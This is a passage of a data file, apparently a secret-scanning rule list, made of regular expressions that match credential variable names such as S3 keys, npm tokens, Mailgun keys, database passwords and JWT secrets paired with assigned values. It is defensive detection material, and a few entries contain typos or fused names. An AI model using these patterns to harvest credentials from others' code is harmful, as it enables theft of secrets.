"(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?repotoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?passwordtravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nexuspassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nativeevents[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kubeconfig[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 